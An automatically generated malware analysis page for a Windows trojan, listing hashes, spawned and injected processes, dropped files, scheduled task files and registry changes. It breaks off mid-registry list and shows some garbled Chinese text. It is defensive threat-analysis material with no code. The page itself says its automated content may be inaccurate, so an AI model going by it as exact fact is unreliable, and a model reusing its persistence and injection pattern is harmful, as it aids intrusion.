Trojan.Generic.12152654_41115417ce

by malwarelabrobot on December 21st, 2014 in Malware Descriptions.

Trojan.Win32.Badur.kict (Kaspersky), Trojan.Generic.12152654 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 41115417ce44a83fc6e4343f11f8e63d
SHA1: 53068ee320b3e8bec8c55544c8f2dda38cd1ee96
SHA256: 862fda1c753b2ec5f7c6fbf7545a6604a464bdac84f1d475c9bf3d865c6e63ff
SSDeep: 12288:7HR bnuGLydXXv42SGQ1O53mLjGsY4seAgZrnej6JKcXnf:7HRbGL2v42TQomC4saZDeGJJf
Size: 712704 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-24 16:47:16
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

yx_dts.exe:1476
%original file name%.exe:1452
notify.exe:2104
9158chat2_ktv083_98.exe:516
assistupdate.exe:2080
dts.exe:1728
dts.exe:1772
OfficeAssist.0419.80.1123.exe:744
OfficeAssist.0419.80.1123.exe:1752
regsvr32.exe:2136
regsvr32.exe:2716
regsvr32.exe:1280
regsvr32.exe:2280
regsvr32.exe:1124
regsvr32.exe:2940
9158.exe:2088

The Trojan injects its code into the following process(es):

MM-liao8398.exe:824
dts.exe:1940
1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process yx_dts.exe:1476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\´óÌìʹ֮½£.lnk (944 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\´óÌìʹ֮½£.lnk (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\жÔØ´óÌìʹ֮½£.lnk (975 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\´óÌìʹ֮½£.lnk (956 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (0 bytes)

The process MM-liao8398.exe:824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
C:\temp.icon (1444 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)

The process %original file name%.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)

The process notify.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
%WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)

The process 9158chat2_ktv083_98.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\жÔØ 9158¶àÈËÊÓƵ.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\9158¶àÈËÊÓƵ.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓƵ.lnk (575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (0 bytes)

The process assistupdate.exe:2080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)

The process dts.exe:1940 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (1234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
%Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (0 bytes)

The process dts.exe:1728 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (72 bytes)

The process dts.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (164 bytes)

The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
%Program Files%\MM-liao8398.exe (59304 bytes)
%Program Files%\2.ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
%Program Files%\onlines_30863.exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Program Files%\1.rar (26 bytes)
%Program Files%\yx_dts.exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
%Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp (0 bytes)

The process OfficeAssist.0419.80.1123.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\卸载.lnk (994 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (0 bytes)

The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (0 bytes)

Registry activity

The process yx_dts.exe:1476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"URLInfoAbout" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"DisplayVersion" = "3.1.0.0"
"Publisher" = "´óÌìʹ֮½£"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
